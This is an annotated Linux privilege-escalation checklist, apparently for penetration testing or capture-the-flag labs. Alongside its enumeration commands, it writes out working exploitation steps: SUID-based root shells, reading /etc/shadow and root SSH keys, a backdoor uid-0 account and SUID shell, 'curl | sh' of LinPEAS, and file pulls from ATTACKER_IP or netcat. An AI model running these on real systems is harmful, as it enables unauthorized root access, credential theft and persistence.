Privilege Escalation Checklist
Initial Enumeration
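# System information
uname -a
cat /etc/os-release
cat /proc/version
lscpu
# User information
id
whoami
# -n: never prompt for a password, so this cannot hang a non-interactive shell.
# A "password is required" error means rules may exist but need the user's password (drop -n if you have it).
sudo -n -l
# Accounts that can actually log in (shell is not nologin/false)
grep -vE 'nologin|false' /etc/passwd
cat /etc/shadow 2>/dev/null # Only readable as root or through a misconfiguration; always worth a try
cat /etc/group
# Group memberships worth noting: docker, lxd, disk, adm, shadow, sudo, wheel, video
id | tr ',' '\n'
# `history` is a shell builtin and is usually empty in a non-login shell; read the files as well
history
cat ~/.bash_history ~/.zsh_history 2>/dev/null
env
# Network information
ifconfig -a || ip a
route || ip route
netstat -antup || ss -tunlp
iptables -L 2>/dev/null # Normally needs root; an error here is expected as a low-privileged user
cat /etc/hosts
cat /etc/resolv.conf
# Running processes (look for root-owned daemons and credentials passed on the command line)
ps aux
ps -ef
pstree
# Installed packages and services
dpkg -l # Debian-based
rpm -qa # Red Hat-based
service --status-all
systemctl list-unit-files
ls -la /etc/init.d/
# World-writable directories and files.
# NOTE: `find -writable` answers "can the *current user* write this" (owner and group bits included),
# which is a different question. `-perm -0002` tests the "other" write bit, i.e. world-writable.
# /proc, /sys and /dev are excluded because they are full of writable pseudo-files.
find / -perm -0002 -type d -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" 2>/dev/null
find / -perm -0002 -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" 2>/dev/null
# Files writable by you specifically (includes your own files, so expect more noise)
find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" 2>/dev/null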
# Find world-executable files (noisy: nearly every binary matches; what matters is executables in odd places such as /tmp, /home or /opt)
find / -perm -o+x -type f 2>/dev/null
SUID/SGID Binaries
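# Find SUID files (setuid bit, octal 4000). -ls prints owner and mode in the same pass:
# only a root-owned (or interesting-user-owned) binary is useful, and a setuid file on a
# filesystem mounted nosuid is inert.
find / -perm -4000 -type f -ls 2>/dev/null
# Find SGID files (setgid bit, octal 2000)
find / -perm -2000 -type f -ls 2>/dev/null
# Mounts on which the kernel ignores SUID/SGID bits
mount | grep nosuid
# Compare the result with a clean install of the same distro release; anything that is not
# part of the base system is the candidate list to check against GTFOBins.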
# Both in one command
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
Exploiting Common SUID Binaries
Using base64 with SUID to read protected files
If base64 is setuid root, it opens its input file with root's privileges and writes the encoded content to stdout, so it can be used to read any file that normally requires elevated privileges (the bit is ignored on filesystems mounted nosuid, and a bit owned by a non-root user only gives you that user):
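# Check if base64 has SUID bit: an 's' in the owner execute slot (e.g. -rwsr-xr-x) AND root ownership.
ls -la /usr/bin/base64
stat -c '%U %A %n' /usr/bin/base64
# If it does, use it to read sensitive files. Only the first base64 has to be the SUID copy;
# the decoding one runs as you, so any base64 (`base64 -d` works on GNU and busybox) will do.
/usr/bin/base64 /etc/shadow | base64 --decode
/usr/bin/base64 /root/.ssh/id_rsa | base64 --decode
/usr/bin/base64 /var/log/auth.log | base64 --decode
# Use it to read flag files or other sensitive data
/usr/bin/base64 /root/root.txt | base64 --decode
/usr/bin/base64 /home/user/flag.txt | base64 --decode
# Read password hashes to crack offline (john/hashcat). Save the whole file for cracking
# rather than grepping single users; the grep is just a quick look.
/usr/bin/base64 /etc/shadow | base64 --decode > /tmp/shadow.txt
/usr/bin/base64 /etc/shadow | base64 --decode | grep root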
/usr/bin/base64 /etc/shadow | base64 --decode | grep admin
Other common SUID exploitation techniques
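# If find has SUID bit: find execs the command directly (no intermediate shell), so -p keeps
# the elevated euid. Without -p, bash resets its euid to your real uid and you get nothing.
# Use /bin/bash -p if /bin/sh rejects -p. Confirm with `id` that euid=0 afterwards.
find . -exec /bin/sh -p \; -quit
# Quick check that the bit works at all (prints the binary owner's name)
find / -name example -exec whoami \;
# If vim/nano has SUID bit
# vim runs :! through `sh -c`. If /bin/sh is bash, that shell drops the setuid euid before the
# inner -p is ever seen, so this works where /bin/sh is dash (Debian/Ubuntu) and not where it
# is bash; in that case use vim's scripting interface to exec a shell with -p directly.
vim -c ':!/bin/sh -p'
# nano: -s sets the spell-checker program; open a buffer, type anything and press ^T to launch it.
nano -s /bin/sh
# nano alternative: ^R^X (read file / execute command) runs a command through sh -c, same euid caveat as vim
nano
^R^X
reset; sh -p 1>&0 2>&0
# If cp has SUID bit, the useful primitive is a root *file write*, not "copy a shell":
# a copy made by a root-SUID cp is owned by root, so your own `chmod +s` on it fails with EPERM.
# Add a uid-0 user to a copy of /etc/passwd and overwrite the real one (keep a backup to restore).
cp /etc/passwd /tmp/passwd.bak
HASH=$(openssl passwd -1 -salt xyz secret)   # crypt(3) hash of the password 'secret'
cp /etc/passwd /tmp/passwd
echo "pwned:${HASH}:0:0:root:/root:/bin/bash" >> /tmp/passwd
cp /tmp/passwd /etc/passwd   # the SUID cp writes it as root
su pwned                     # password: secret
# From the root shell, a SUID shell can be left behind for re-entry (run it with -p, as below)
cp /bin/sh /tmp/sh
chmod +s /tmp/sh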
/tmp/sh -p
Sudo Rights
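# List sudo rights. -n: fail instead of prompting, so a non-interactive shell cannot hang here;
# drop -n when you know the user's password. Read the output carefully: NOPASSWD entries, wildcards,
# and entries for interpreters/editors/pagers (see "Sudo Commands to Look For") are the usual paths.
sudo -n -l
# sudo version: older releases have well-known local privilege escalation bugs, so check it against
# the advisories for the version shown
sudo -V | head -1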
# Check if you can run anything with sudo (add -n in a non-interactive shell so sudo errors out instead of waiting on a password prompt)
sudo -l 2>/dev/null | grep -v "not allowed" | grep -v "no sudo"
Capabilities
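# List all files with capabilities. One recursive call from / already covers every directory;
# the per-directory calls below are subsets kept for quick spot checks.
getcap -r / 2>/dev/null
# Capabilities that are escalation paths on their own when set on a binary you can run:
# cap_setuid/cap_setgid (become root), cap_dac_read_search/cap_dac_override (read or write any file),
# cap_sys_admin, cap_sys_ptrace, cap_sys_module, cap_chown, cap_fowner
getcap -r / 2>/dev/null | grep -E 'cap_(setuid|setgid|dac_read_search|dac_override|sys_admin|sys_ptrace|sys_module|chown|fowner)'
# Check specific directories for capabilities
getcap -r /usr/bin/ 2>/dev/null
getcap -r /usr/sbin/ 2>/dev/null
getcap -r /bin/ 2>/dev/null
# Capabilities of your own process (CapEff is what you can use now); decode the hex with `capsh --decode=<hex>`
grep Cap /proc/self/status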
getcap -r /sbin/ 2>/dev/null
Cron Jobs
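# View crontabs: system-wide, the per-user spool, anacron, and systemd timers (which replace cron on many hosts)
cat /etc/crontab
ls -la /etc/cron*
cat /etc/anacrontab 2>/dev/null
ls -la /var/spool/cron/ /var/spool/cron/crontabs/ 2>/dev/null
crontab -l 2>/dev/null
systemctl list-timers --all 2>/dev/null
# Look for unusual cron jobs
find /etc/cron* -type f -exec ls -la {} \; 2>/dev/null
# The actual escalation path is a root-run job whose script, or the directory holding it, you can write to
find /etc/cron* -writable 2>/dev/null
# Cron runs with its own PATH (set at the top of /etc/crontab). A job that calls a command by bare
# name is hijackable if a directory earlier in that PATH is writable by you.
grep -E '^PATH=' /etc/crontab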
find /var/spool/cron -type f -exec ls -la {} \; 2>/dev/null
PATH Manipulation
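# Check PATH
echo "$PATH"
# Find writable directories in PATH.
# The original `find $d -writable -type d` recursed *below* each PATH entry and reported any writable
# subdirectory, which is not what a PATH hijack needs: it is the PATH entry itself that must be
# writable (so you can drop a binary that shadows one called by bare name from a privileged context).
# Splitting on ':' with tr keeps entries containing spaces intact; an empty entry or '.' means the
# current directory is searched, which is a hijack on its own.
printf '%s\n' "$PATH" | tr ':' '\n' | while IFS= read -r d; do
  case "$d" in
    ''|.) echo "relative entry in PATH: '$d'" ;;
  esac
  [ -w "$d" ] && echo "writable: $d"
done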
# Find writable files in PATH (quote "$d" and prefer $(...) over backticks if you reuse this in a script)
for d in `echo $PATH | tr ":" "\n"`; do
find $d -writable -type f 2>/dev/null
done
NFS Shares
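# Check NFS exports (only present if the host itself is an NFS server)
cat /etc/exports 2>/dev/null
# What the server currently exports and to whom; a '*' client list means anyone on the network can mount it
showmount -e localhost 2>/dev/null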
# Check if 'no_root_squash' option is present: root on a client that mounts the export stays root on it, so files it creates there are root-owned (including SUID binaries, unless the filesystem is mounted nosuid on the target)
cat /etc/exports | grep no_root_squash
Kernel Exploits
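# Kernel version. Public kernel exploits target specific release strings and distro builds, so
# record the exact version, not just the major number.
uname -a
uname -r
uname -m
cat /proc/version
# Distribution details
cat /etc/issue
lsb_release -a 2>/dev/null
# A failed kernel exploit commonly panics the host. Treat this as a last resort and make sure a
# crash or reboot is acceptable before running one.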
cat /etc/os-release
Passwords and Sensitive Files
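# Config files with passwords
grep -r "password" /etc/ 2>/dev/null
# Same search, case-insensitive and widened to the other common key names; -l lists only file names
grep -rliE 'password|passwd|secret|token' /etc/ 2>/dev/null
# NOTE: in find, -a (implicit between tests) binds tighter than -o, so
# `-name "*.conf" -o -name "*.config" -exec ...` only ran the grep for *.config files and
# silently did nothing for *.conf. Grouping the name tests fixes that.
find /etc \( -name "*.conf" -o -name "*.config" \) -exec grep -li "password" {} + 2>/dev/null
# Check common files for credentials
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa
# Other credential stores worth a look: every key type, ssh config, netrc, git and docker credentials
ls -la ~/.ssh/ 2>/dev/null
cat ~/.ssh/config ~/.netrc ~/.git-credentials ~/.docker/config.json 2>/dev/null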
cat ~/.ssh/id_rsa.pub
Finding Files
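# Find all .txt files (useful for finding flags); /proc is excluded to cut pseudo-file noise
find / -name "*.txt" -not -path "/proc/*" 2>/dev/null
# Find specific flag files (-iname: case-insensitive, so FLAG.txt and flag are both caught)
find / -iname "*flag*" -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -i flag
# Find files with specific content (-i: case-insensitive, -n: line numbers so the hit is easy to locate)
grep -rni "password" /home 2>/dev/null
grep -rni "flag" /home 2>/dev/null
# Web roots and optional software often carry configs with credentials
grep -rniE 'password|passwd' /var/www /opt 2>/dev/null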
# Find recently modified files (last 24 hours); add -not -path "/proc/*" to cut pseudo-file noise
find / -type f -mtime -1 2>/dev/null
Automated Tools (If Available)
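# All four tools below are fetched from GitHub by the target itself. Before doing that, note:
#  - `curl ... | sh` executes whatever the server returns, with no integrity check and nothing
#    left on disk to inspect afterwards;
#  - outbound HTTPS from the target is logged or blocked in many environments, and these scripts
#    are well known to AV/EDR, so expect alerts;
#  - the quieter option is to fetch on your own machine, verify the hash, and serve the file to
#    the target yourself (see File Transfer Methods).
# Download and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Download and run LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
# Download and run Linux Smart Enumeration (-l1 shows more than the default; -l2 dumps everything)
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh
./lse.sh -l1
# Download and run Linux Exploit Suggester. Its output is a list of candidates matched on version
# strings, not confirmed working exploits: verify each one against the exact kernel build first.
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh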
./linux-exploit-suggester.sh
Step-by-Step Methodology
Collect system information (OS, kernel, hardware)
Check current user privileges and groups
Look for SUID/SGID binaries
Check sudo privileges (sudo -l)
Check for capabilities
Examine cron jobs
Inspect PATH for opportunities
Look for NFS shares with no_root_squash
Check for sensitive files with passwords
Hunt for world-writable files and directories
Look for unusual services or processes
If possible, run automated enumeration tools
Consider kernel exploits as a last resort
Common Exploits by Binary
SUID Binaries to Look For
base64 # Read sensitive files
cp # Copy malicious binaries
find # Execute commands
bash/dash # Get shell with elevated privileges (bash must be started with -p, otherwise it resets its euid to your real uid and the SUID bit is wasted)
nmap # Interactive mode or script execution
vim/nano # Edit files or get shell
less/more # Read files or get shell
Sudo Commands to Look For
vi/vim
less
more
man
awk
perl
python
ruby
nmap
tcpdump
bash
sh
find
File Transfer Methods
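# Python HTTP server (run on the attacker machine, in the directory holding the files to serve).
# Everything in that directory becomes readable to anyone who can reach the port, so serve from a
# dedicated directory and stop the server when done.
python -m SimpleHTTPServer 8000 # Python 2
python3 -m http.server 8000 # Python 3
# Download with wget
wget http://ATTACKER_IP:8000/filename
# Download with curl
curl http://ATTACKER_IP:8000/filename -o filename
# Netcat file transfer (receiver). -n skips DNS lookups. The listener accepts the first connection
# from anyone, unauthenticated and unencrypted, so start it just before sending and close it after.
# On the sending side redirect the file in (`nc RECEIVER_IP 1234 < filename`) and add -N (OpenBSD nc)
# or -q 0 (traditional nc) so the sender exits at EOF instead of hanging open.
nc -lvnp 1234 > filename
# Compare checksums on both ends to confirm the copy is complete
md5sum filename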
# Netcat file transfer (sender)
cat filename | nc RECEIVER_IP 1234